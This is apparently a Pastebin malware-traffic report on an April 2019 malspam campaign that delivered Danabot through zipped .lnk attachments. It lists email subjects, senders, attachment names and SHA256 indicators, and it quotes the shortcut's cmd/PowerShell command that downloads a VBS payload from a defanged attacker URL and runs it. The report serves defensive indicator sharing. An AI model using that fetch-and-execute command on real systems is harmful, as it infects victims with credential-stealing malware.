malware_traffic

2019-04-19 - malspam pushing Danabot

Apr 19th, 2019
889
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. 2019-04-19 - MALSPAM WITH ATTACHED ARCHIVES CONTINING .LNK FILES PUSHING DANABOT
  2.  
  3. CHAIN OF EVENTS:
  4.  
  5. Email --> Attached zip archive --> Extracted .lnk file --> 1.5 MB VBS retrieved from business4good[.]eu/hren.php --> 481 kB Danabot EXE created by VBS file
  6.  
  7. $ grep Subject *.eml
  8. 2014-04-19-malspam-0228-UTC.eml:Subject: Inner City CRR Network Meeting
  9. 2014-04-19-malspam-0232a-UTC.eml:Subject: Inner City CRR Network Meeting
  10. 2014-04-19-malspam-0232b-UTC.eml:Subject: Inner City CRR Network Meeting
  11. 2014-04-19-malspam-0238-UTC.eml:Subject: Inner City CRR Network Meeting
  12. 2014-04-19-malspam-0241-UTC.eml:Subject: Inner City CRR Network Meeting
  13. 2014-04-19-malspam-0251-UTC.eml:Subject: Inner City CRR Network Meeting
  14. 2014-04-19-malspam-0256-UTC.eml:Subject: Inner City CRR Network Meeting
  15. 2014-04-19-malspam-0503-UTC.eml:Subject: Inner City CRR Network Meeting
  16.  
  17. $ grep From: *.eml
  18. 2014-04-19-malspam-0228-UTC.eml:From: Betty Wellman <7e754@3bc73.com>
  19. 2014-04-19-malspam-0232a-UTC.eml:From: "Ravizee, Monica" <8f863d34@c5447.edu>
  20. 2014-04-19-malspam-0232b-UTC.eml:From: "Duffy, Kasey" <4ef33a@ea98e70.edu>
  21. 2014-04-19-malspam-0238-UTC.eml:From: <62a@4c90fe.com>
  22. 2014-04-19-malspam-0241-UTC.eml:From: Sahnly Phan-Chan Pha0194 <d3325d5@13c5aa11886a3a316e42d.au>
  23. 2014-04-19-malspam-0251-UTC.eml:From: =?utf-8?B?2YfZitmB2KfYoSDZhdit2YXYryDYs9i52K8g2KfZhNi02KjZitio?=
  24. 2014-04-19-malspam-0256-UTC.eml:From: =?utf-8?B?2LPYp9ix2Kkg2LnYqNiv2KfZhNmF2K3Ys9mGINmF2K3ZhdivINi52KjYr9in?=
  25. 2014-04-19-malspam-0503-UTC.eml:From: =?utf-8?B?2YfZitmB2KfYoSDZhdit2YXYryDYs9i52K8g2KfZhNi02KjZitio?=
  26.  
  27. $ grep filename= *.eml
  28. 2014-04-19-malspam-0228-UTC.eml:Content-Disposition: attachment; filename="nMeeert19583.zip"; size=28635;
  29. 2014-04-19-malspam-0232a-UTC.eml:Content-Disposition: attachment; filename="nMeeert78598.zip"; size=27866;
  30. 2014-04-19-malspam-0232b-UTC.eml:Content-Disposition: attachment; filename="nMeeert55514.zip"; size=30056;
  31. 2014-04-19-malspam-0238-UTC.eml:Content-Disposition: attachment; filename="nMeeert91228.zip"; size=21880;
  32. 2014-04-19-malspam-0241-UTC.eml:Content-Disposition: attachment; filename="nMeeert47131.zip"; size=26269;
  33. 2014-04-19-malspam-0251-UTC.eml:Content-Disposition: attachment; filename="nMeeert74116.zip"; size=27517;
  34. 2014-04-19-malspam-0256-UTC.eml:Content-Disposition: attachment; filename="nMeeert9433.zip"; size=25205;
  35. 2014-04-19-malspam-0503-UTC.eml:Content-Disposition: attachment; filename="nMeeert30458.zip"; size=28133;
  36.  
  37. $ shasum -a 256 *.eml
  38. 085d0045e93c59ba8fcbac06f09caa3cf63c5b37353f6722600c6faa167940dc 2014-04-19-malspam-0228-UTC.eml
  39. 1cd2b8a8e7519e7902601230df061fffc8c1a033e0a3d6dadbc20b258b46c017 2014-04-19-malspam-0232a-UTC.eml
  40. 5914536c8da0feedb01ce78114b99d8d23b074a28c291588673587eca62d64a1 2014-04-19-malspam-0232b-UTC.eml
  41. 0f5f3b6023557c3480ed28cbcadbaf426969ef83f297d30bcd796ea03b22bc23 2014-04-19-malspam-0238-UTC.eml
  42. 9604d0cc7b98b56cd7b811e2cde91172ad7187d88a3df075b616e00bfe743f8c 2014-04-19-malspam-0241-UTC.eml
  43. f314783a04bf0bf69d69baf55d79248f731580fe1ccf5c4773edea48141dcdf4 2014-04-19-malspam-0251-UTC.eml
  44. 722b896aee101545a83b45f751d9c111d81be1f9d45a0d9520c18ead40a2c38b 2014-04-19-malspam-0256-UTC.eml
  45. 15019b15348aeabffc81af614378900e87e455bd5538e6c4e4d7430b59e5f4db 2014-04-19-malspam-0503-UTC.eml
  46.  
  47. $ shasum -a 256 *.zip
  48. 1b214e8fb5ee2561d7dc32ae6075b9d984e55968fcec453d7c0d69591adde724 nMeeert19583.zip
  49. e0abcda09bdf517bfebfc26a8f12bbf3202e709ef8a4a23383e9900bc6077c67 nMeeert30458.zip
  50. e55458aac38ef9bd06e5e82c90c369f4ed89e0fa599f703271ec3f6ab9638011 nMeeert47131.zip
  51. eeba8af15905e1f00ae45720998ff6fd4e4d2124672b78fdd72de67dcaae4c93 nMeeert55514.zip
  52. 3cd388ddd9a45a0eb5e2defb5941251d8b44ba9fe88ef30306fe00629af7ac17 nMeeert74116.zip
  53. 6b962a63f26cfbe6fba89f58522ee99e63e1e655f477cb58d6411ad991e813f2 nMeeert78598.zip
  54. e29af015c6df4b291d90591100cd6c63c21f8ed7218d596ea8ab4af7dad919dc nMeeert91228.zip
  55. ed1beff140614fc40d72d665baf1ff1b1bd9e75705e4f8583a22a0116b2dbf76 nMeeert9433.zip
  56.  
  57. $ shasum -a 256 *.lnk
  58. b9f30f5ddf614e5e449a930b1fb5019cdc004b804ab72efcb3a716b30879195d nMeeert19583.lnk
  59. b9f30f5ddf614e5e449a930b1fb5019cdc004b804ab72efcb3a716b30879195d nMeeert30458.lnk
  60. b9f30f5ddf614e5e449a930b1fb5019cdc004b804ab72efcb3a716b30879195d nMeeert47131.lnk
  61. b9f30f5ddf614e5e449a930b1fb5019cdc004b804ab72efcb3a716b30879195d nMeeert55514.lnk
  62. b9f30f5ddf614e5e449a930b1fb5019cdc004b804ab72efcb3a716b30879195d nMeeert74116.lnk
  63. b9f30f5ddf614e5e449a930b1fb5019cdc004b804ab72efcb3a716b30879195d nMeeert78598.lnk
  64. b9f30f5ddf614e5e449a930b1fb5019cdc004b804ab72efcb3a716b30879195d nMeeert91228.lnk
  65. b9f30f5ddf614e5e449a930b1fb5019cdc004b804ab72efcb3a716b30879195d nMeeert9433.lnk
  66.  
  67. SHORTCUT FROM .LNK FILE:
  68.  
  69. C:\Windows\System32\cmd.exe /c @echo off&powershell -command Invoke-WebRequest "hxxp://business4good[.]eu/hren.php" -OutFile "%tmp%\tmp856845.vbs"; start-process %tmp%\tmp856845
  70.  
  71. ASSOCIATED MALWARE:
  72.  
  73. SHA256 hash: f2d51add5d58d4712d9e024f1e9bdb0f6d4955a749b6a09972344dfd778b8ca4
  74. File size: 1,544,171 bytes
  75. File location: hxxp://business4good[.]eu/hren.php
  76. File location: C:\Users\[username]\AppData\Local\Temp\tmp856845.vbs
  77. File description: Initial VBS file downloaded after double-clicking extracted LNK file.
  78. Any.Run analysis: https://app.any.run/tasks/353a979f-df1c-4512-9c71-f1e77ad14ae5
  79.  
  80. SHA256 hash: 9f98291702605aed9e61085a4e9d4e83cfe0942757542487fd36da92cdbd48e9
  81. File size: 480,768 bytes
  82. File location: C:\Users\[username]\AppData\Local\Temp\tOIRccbdGFRn.dllMvVviGEN
  83. File description: Danabot EXE created by the above VBS file
  84. Any.Run analysis: https://app.any.run/tasks/a6ebc434-3cdc-4aa2-8665-6a984fbfc727
RAW Paste Data